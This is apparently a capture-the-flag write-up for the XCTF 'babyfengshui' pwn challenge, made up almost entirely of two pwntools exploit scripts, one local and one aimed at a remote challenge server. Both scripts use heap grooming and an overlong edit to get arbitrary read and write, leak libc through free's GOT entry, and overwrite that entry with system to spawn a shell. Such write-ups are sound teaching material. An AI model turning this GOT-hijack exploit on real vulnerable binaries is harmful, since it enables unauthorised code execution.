题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4713&page=2
分析
exp
本地:
from pwn import *
context(arch='i386',os='linux',log_level='debug')
myelf = ELF("./babyfengshui")
# The script is tied to this exact libc build: the symbol offsets used later are
# read from it. ASLR only randomises the base, so a single leak suffices.
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")
io = process(myelf.path)
# Menu wrappers. Each one answers the binary's prompts in the order the binary
# asks them ("n: " menu choice, "x: " index, "h: " length, "t: " text, "e: "
# name); the prompt fragments and the send order are protocol-bound and must not
# be changed independently of the binary.
sla = lambda delim,data : (io.sendlineafter(delim, data))
delete = lambda index : (sla("n: ","1"),sla("x: ",str(index)))
show = lambda index : (sla("n: ","2"),sla("x: ",str(index)))
edit = lambda index,len,text : (sla("n: ","3"),sla("x: ",str(index)),sla("h: ",str(len)),sla("t: ",text))
add = lambda size,name,len,text : (sla("n: ","0"),sla("n: ",str(size)),sla("e: ",name),sla("h: ",str(len)),sla("t: ",text))
# heap fengshui
# Arrange the heap so that a later oversized edit() on entry 2 reaches entry 1's
# bookkeeping (see aar()/aaw() below). Which entry lands where is an inferred
# property of this binary's allocator usage — confirm with a heap dump.
add(0x8,'name0',0x8,'text0')
add(0x8,'name1',0x8,'text1')
delete(0)
add(0x80,'name2',0x8,'text2')
# input system arg $0 to chunk3
# Entry 3's text is the string later handed to system() when entry 3 is freed
# through the hijacked GOT slot.
add(0x80,'name3',0x8,'$0')
# arbitrary address read
def aar(addr: int) -> int:
    """Read the 4 bytes at *addr* from the target process.

    Writes 0x98 NUL bytes followed by *addr* through entry 2 (allocated with
    size 0x80, so the 0x9c-byte edit runs past it — presumably the binary does
    not check the edit length against the allocation).  The trailing pointer
    appears to land on entry 1's description pointer, which is why show(1)
    then prints memory at *addr*; confirm against the binary's struct layout.

    Returns the little-endian u32 printed after the "description: " prompt.
    """
    edit(2,0x9c,'\x00'*0x98+p32(addr))
    show(1);io.recvuntil('description: ')
    return u32(io.recv(4))
# lower than heap address write
def aaw(addr: int, content) -> None:
    """Write *content* to *addr* in the target process.

    Uses the same redirection as aar(): entry 1's description pointer is
    repointed at *addr*, then edit(1) writes *content* through it.  The
    original "lower than heap address" note is presumably a bound the binary
    enforces on the pointer target — confirm; the GOT address used by the
    caller satisfies it.  `len(content)` is sent as the edit length.
    """
    edit(2,0x9c,'\x00'*0x98+p32(addr))
    edit(1,len(content),content)
# use aar and aaw to leak libc and hijack got table
# Leak free's resolved address from the GOT and subtract its offset in the loaded
# libc ELF to recover the libc base.  Relies on the libc on disk matching the
# one mapped into the process.
libc.address = aar(myelf.got['free'])-libc.symbols['free']
# Overwrite the GOT slot of free with system.  This step only works because the
# GOT is writable at runtime; with Full RELRO the slot would be read-only.
aaw(myelf.got['free'],p32(libc.symbols['system']))
# trigger free(chunk3) to call system($0)
# Deleting entry 3 calls free() on its description, which now resolves to
# system(), with the "$0" text from add() as the argument.
delete(3);io.interactive()
远程:
from pwn import *
context(arch='i386',os='linux',log_level='debug')
myelf = ELF("./babyfengshui")
# Loaded for consistency with the local script; the remote variant below uses
# hard-coded offsets rather than this object's symbol table.
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")
io =remote('111.198.29.45',56768)
# Menu wrappers. Each one answers the binary's prompts in the order the binary
# asks them ("n: " menu choice, "x: " index, "h: " length, "t: " text, "e: "
# name); the prompt fragments and the send order are protocol-bound and must not
# be changed independently of the binary.
sla = lambda delim,data : (io.sendlineafter(delim, data))
delete = lambda index : (sla("n: ","1"),sla("x: ",str(index)))
show = lambda index : (sla("n: ","2"),sla("x: ",str(index)))
edit = lambda index,len,text : (sla("n: ","3"),sla("x: ",str(index)),sla("h: ",str(len)),sla("t: ",text))
add = lambda size,name,len,text : (sla("n: ","0"),sla("n: ",str(size)),sla("e: ",name),sla("h: ",str(len)),sla("t: ",text))
# heap fengshui
# Arrange the heap so that a later oversized edit() on entry 2 reaches entry 1's
# bookkeeping (see aar()/aaw() below). Which entry lands where is an inferred
# property of this binary's allocator usage — confirm with a heap dump.
add(0x8,'name0',0x8,'text0')
add(0x8,'name1',0x8,'text1')
delete(0)
add(0x80,'name2',0x8,'text2')
# input system arg $0 to chunk3
# Entry 3's text is the string later handed to system() when entry 3 is freed
# through the hijacked GOT slot.
add(0x80,'name3',0x8,'$0')
# arbitrary address read
def aar(addr: int) -> int:
    """Read the 4 bytes at *addr* from the target process.

    Writes 0x98 NUL bytes followed by *addr* through entry 2 (allocated with
    size 0x80, so the 0x9c-byte edit runs past it — presumably the binary does
    not check the edit length against the allocation).  The trailing pointer
    appears to land on entry 1's description pointer, which is why show(1)
    then prints memory at *addr*; confirm against the binary's struct layout.

    Returns the little-endian u32 printed after the "description: " prompt.
    """
    edit(2,0x9c,'\x00'*0x98+p32(addr))
    show(1);io.recvuntil('description: ')
    return u32(io.recv(4))
# lower than heap address write
def aaw(addr: int, content) -> None:
    """Write *content* to *addr* in the target process.

    Uses the same redirection as aar(): entry 1's description pointer is
    repointed at *addr*, then edit(1) writes *content* through it.  The
    original "lower than heap address" note is presumably a bound the binary
    enforces on the pointer target — confirm; the GOT address used by the
    caller satisfies it.  `len(content)` is sent as the edit length.
    """
    edit(2,0x9c,'\x00'*0x98+p32(addr))
    edit(1,len(content),content)
# use aar and aaw to leak libc and hijack got table
# Same flow as the local script, but with the remote target's libc offsets
# hard-coded instead of read from `libc.symbols` — presumably the offsets of
# free (0x070750) and system (0x03a940) in the server's libc build; they are
# valid for that build only.
libc.address = aar(myelf.got['free'])-0x070750
# Overwrite the GOT slot of free.  This only works because the GOT is writable
# at runtime; with Full RELRO the slot would be read-only.
aaw(myelf.got['free'],p32(libc.address+0x03a940))
# trigger free(chunk3) to call system($0)
# Deleting entry 3 calls free() on its description, which now resolves to
# system(), with the "$0" text from add() as the argument.
delete(3);io.interactive()